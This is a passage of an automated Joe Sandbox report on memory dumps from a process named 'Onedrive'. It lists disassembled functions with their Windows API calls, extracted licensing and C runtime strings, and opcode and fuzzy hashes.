                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressErrorFreeHandleLastLoadModuleProc
                                                    • String ID: SLpTriggerServiceWorker$SPPC.DLL$syncreeval
                                                    • API String ID: 590180482-1899451423
                                                    • Opcode ID: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
                                                    • Instruction ID: f2f615c426d51c6b458d3818ee1e5de9f6ad5cb5d0a3bbbe7979c9ce5e82557a
                                                    • Opcode Fuzzy Hash: 46e5b8ab7ea2b751467af070a34f81cb02269ece383fb26039dd3aadbd22565e
                                                    • Instruction Fuzzy Hash: 56119625B48B4386FB145B66A41127966D1EFBD791B495034ED0FC7740EE3CE40CA220
                                                    Function 00007FF63EA14D48 Relevance: 13.7, APIs: 9, Instructions: 191memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heapwcsstr$FreeProcess$_wtoi
                                                    • String ID:
                                                    • API String ID: 3961436675-0
                                                    • Opcode ID: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
                                                    • Instruction ID: 000d49abc91ee5e816296cb1eb4325fa74e3b097d593e6175517cf702b0ff480
                                                    • Opcode Fuzzy Hash: 565a0733e25fc3e969219e8b484113a938c3ddbc655a07c7785b9cc9b0e56fb7
                                                    • Instruction Fuzzy Hash: DB71D722B08B9686EB109B66A4041B97AD1FFB8BD5F458134FE4EC7795DE3CE409D320
                                                    Function 00007FF63EA1D618 Relevance: 13.7, APIs: 9, Instructions: 171memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D688
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D69C
                                                    • wcschr.MSVCRT(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D6B9
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D7B2
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D7C6
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D7F4
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D808
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D82F
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1D843
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$wcschr
                                                    • String ID:
                                                    • API String ID: 3583101917-0
                                                    • Opcode ID: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
                                                    • Instruction ID: c542e2721955603cf15aec540940ccb66f27c7e2368642867af04507ae6f79c1
                                                    • Opcode Fuzzy Hash: 185475bb1725aeff1ff69b328b1550321ae0c595b163fea367dc587829107306
                                                    • Instruction Fuzzy Hash: C7616322B08B52C6FF059FA194400BD67A1BFA5B85B498435FE0D97785EF3CE549E320
                                                    Function 00007FF63EA1CD40 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: LicenseState$SL_LICENSING_STATUS_IN_GRACE_PERIOD$SL_LICENSING_STATUS_LICENSED$SL_LICENSING_STATUS_NOTIFICATION$SL_LICENSING_STATUS_UNLICENSED
                                                    • API String ID: 2081463915-2812009040
                                                    • Opcode ID: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
                                                    • Instruction ID: 9de7591bb5dd44e89431e134c7f447ec00293376e2a2b2d9a03571990ff08964
                                                    • Opcode Fuzzy Hash: cf784307bdb191ea20cf096f8f6de6f8d4d5616a99717e974fa0e9b77618c7be
                                                    • Instruction Fuzzy Hash: B3218260B0C64286E7588B52E58137D6BA2FF75BC0F449035EA0E97B84EF3CE45CA720
                                                    Function 00007FFDF3B01990 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 358COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFDF3B02010: memcpy_s.LIBCPMTD ref: 00007FFDF3B02061
                                                    • Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FFDF3B01E59
                                                    • Concurrency::details::BoostedObject::IsScheduleGroupSegment.LIBCMTD ref: 00007FFDF3B01FD4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: BoostedConcurrency::details::GroupObject::ScheduleSegment$memcpy_s
                                                    • String ID: %ls$("unexpected input value; log10 failed", 0)$mantissa_buffer_count > 0$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$quotient < digits_per_iteration_multiplier
                                                    • API String ID: 3679209886-1168176157
                                                    • Opcode ID: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
                                                    • Instruction ID: ae33327e66ac0f88d0382cc2d8f6c12d976946c4a0823a241fa1f7f3d2573b8c
                                                    • Opcode Fuzzy Hash: 4325e9b5c20b1b86593e760ec00f5385cf082cd06ed0e168ca7847738c9bb225
                                                    • Instruction Fuzzy Hash: 27023A76B1C6818AE760DB14E460BAAB7A1FB84340F954136E6ED9ABDDDF3CD444CB00
                                                    Function 00007FFDF3AD9560 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: allocator
                                                    • String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 3447690668-215146566
                                                    • Opcode ID: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
                                                    • Instruction ID: 1c23dcc381837f3df011efee9e44ae15151e6c62dd9fcef07096f6ca0fee4059
                                                    • Opcode Fuzzy Hash: 8d57fec41b4c742aac83ea82b647f2bd7548b34a8331297ae6f6faa5e1863818
                                                    • Instruction Fuzzy Hash: 95023D3260CA8685E7709B16E464BBAB3A0FB84750F510235E6ED5BAEDDF3CD4858B40
                                                    Function 00007FFDF3AD8E80 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 331COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: allocator
                                                    • String ID: %ls$("Buffer too small", 0)$buffer != nullptr && buffer_count > 0$common_vsnprintf_s$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                    • API String ID: 3447690668-215146566
                                                    • Opcode ID: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
                                                    • Instruction ID: c238a8a11463e4c2467166a3e11db6d4a24d346b6dd07d7b86ff55dc244f7199
                                                    • Opcode Fuzzy Hash: 9ccc0799407a035980ca35a257dbbe8603f8fb4214fbec40f9633d6e023181ab
                                                    • Instruction Fuzzy Hash: D6023F3260CA8285E7B0DB16E464BAAB3A0FB84754F510235E6ED5BBDDDF3CD4858B40
                                                    Function 00007FF63EA13260 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 164memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$DirectEventFreeIndex@ProcessSelect@SelectionTouchTransferWrite
                                                    • String ID: ChooseRegion$Loading$Number$TollNumber
                                                    • API String ID: 4007878856-2571249176
                                                    • Opcode ID: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
                                                    • Instruction ID: b437324c4d6da15c83a14c6945d9bbb6436d9953702a95d6e4aced688ca0d877
                                                    • Opcode Fuzzy Hash: 0279151202938e21ffb4fb5d64393771a02b836f32215ccfbddf941e754a0aa0
                                                    • Instruction Fuzzy Hash: EA713B21B09A4796FB009FA2E8502B827A5BFB4784F425531EA0ED7795DE3CF41DE320
                                                    Function 00007FF63EA18FF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ?Create@DUIXmlParser@DirectUI@@SAJPEAPEAV12@P6APEAVValue@2@PEBGPEAX@Z2P6AX11H2@Z2@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA19036
                                                    • ?SetXMLFromResource@DUIXmlParser@DirectUI@@QEAAJIPEAUHINSTANCE__@@0@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA19060
                                                    • ?CreateElement@DUIXmlParser@DirectUI@@QEAAJPEBGPEAVElement@2@1PEAKPEAPEAV32@@Z.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA19099
                                                      • Part of subcall function 00007FF63EA166D4: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF63EA1675E
                                                      • Part of subcall function 00007FF63EA16610: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FF63EA166AF
                                                    • GetScaleFactor.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA1910A
                                                    • ?Destroy@DUIXmlParser@DirectUI@@QEAAXXZ.DUI70(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,00000000,?), ref: 00007FF63EA191A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectParser@$FreeTask$CreateCreate@Destroy@E__@@0@Element@Element@2@1FactorFromResource@ScaleV12@V32@@Value@2@
                                                    • String ID: Compliance$ComplianceText
                                                    • API String ID: 570248755-1314619677
                                                    • Opcode ID: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
                                                    • Instruction ID: 72353fb7eef004e3c3f5aecdb5054f80e0f4d024ac04a34ae73856c18421c0d4
                                                    • Opcode Fuzzy Hash: 8b78037bbcabbcbb6045ab8e19150145eef68e87cc9f8055a6f0a411eb7a8557
                                                    • Instruction Fuzzy Hash: 36712E36B08B4686FB119BA6E4403A937A1FBA8788F408435EE4E97755DF3CE44CD750
                                                    Function 00007FF63EA127A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: ErrorCID
                                                    • API String ID: 3859560861-3250631935
                                                    • Opcode ID: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
                                                    • Instruction ID: f3a3d1b753d917c94b255143dcb4e39dd448c1589e61e4f38e89ab9b01985699
                                                    • Opcode Fuzzy Hash: 87562fb0df644233fc4ef7c3f415d9b073dabda7fb8b5e47c8d9690f725e6cbc
                                                    • Instruction Fuzzy Hash: 0E512831F08A56C6FB009BA2D4502BD67A1BFB8784F554435EA0DE7795DF3CE409A320
                                                    Function 00007FFDF3AEBB90 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 110COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: swprintf
                                                    • String ID: $ Data: <%s> %s$%.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                                    • API String ID: 233258989-578187083
                                                    • Opcode ID: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
                                                    • Instruction ID: d1a6ed95b6ec190c088bdc45fabdb4d21a4e399b5a745785c2977d1dc5296687
                                                    • Opcode Fuzzy Hash: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
                                                    • Instruction Fuzzy Hash: 62518D3260CB8585E7209B16E0A47AAB7A0FBC5780F514136EADD5BBDEDF3CD0848B00
                                                    Function 00007FFDF3AF7F60 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
                                                    • String ID: W$g$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                                                    • API String ID: 4142048518-2829134390
                                                    • Opcode ID: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
                                                    • Instruction ID: e8ca4b864951ecbf490f4aedea9d6eb71baf5aeb519a505e8a8a07ff6df32e33
                                                    • Opcode Fuzzy Hash: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
                                                    • Instruction Fuzzy Hash: 9951FC36618B85C2DB10DB1AE46066AB3A4F7C4B84F614235EB9E4B7E9DF3DD445CB00
                                                    Function 00007FFDF3AFAE99 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$local_action != nullptr$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
                                                    • API String ID: 0-2615017910
                                                    • Opcode ID: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
                                                    • Instruction ID: 82dd3b61cd599625c522b5a77f4879d9edf91b14a8727d65d8204a060a61604e
                                                    • Opcode Fuzzy Hash: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
                                                    • Instruction Fuzzy Hash: 9C412B21B1C7C286E7609B22E460B7FB7A4EB80394F110135E6AE5AADDDF7DE544CB40
                                                    Function 00007FFDF3AFB870 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 86memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocSize
                                                    • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                                                    • API String ID: 3906553864-3244948836
                                                    • Opcode ID: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
                                                    • Instruction ID: 6d6a053c0d1cc6121020296db4c5dd8d6600b64444d092c6e0de8131476b39f1
                                                    • Opcode Fuzzy Hash: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
                                                    • Instruction Fuzzy Hash: 3C413D31A0CB8686E7109F26E464B6AB7B0FB84790F510136EAED5A7ECDF7CD4408B40
                                                    Function 00007FFDF3B0DCD0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptr
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                                                    • API String ID: 2978586664-187094882
                                                    • Opcode ID: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
                                                    • Instruction ID: c10418ba016a37966bd079cf47ffdfedfd4f04b4413da366c5d9fcdc13242c7b
                                                    • Opcode Fuzzy Hash: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
                                                    • Instruction Fuzzy Hash: F6413F71B28A8192EB40DB11E471BAAB764FF80740F914236E6AE5B7EADF3CD544C740
                                                    Function 00007FFDF3AD8300 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr_aligned_msize_heap_alloc
                                                    • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                                                    • API String ID: 4052397221-3183830673
                                                    • Opcode ID: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
                                                    • Instruction ID: 6e25eb0644e1179c799b3161bdcbb5ba2af3722ccdda9ed57e7e2a3c6fc54155
                                                    • Opcode Fuzzy Hash: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
                                                    • Instruction Fuzzy Hash: A1310E3271CB8585DB40DB16E4A1A6EB7A4FBC5B80F915032EA9D97BE9DF2CD540C700
                                                    Function 00007FFDF3AECC60 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECD4D
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECDA5
                                                    Strings
                                                    Memory Dump Source
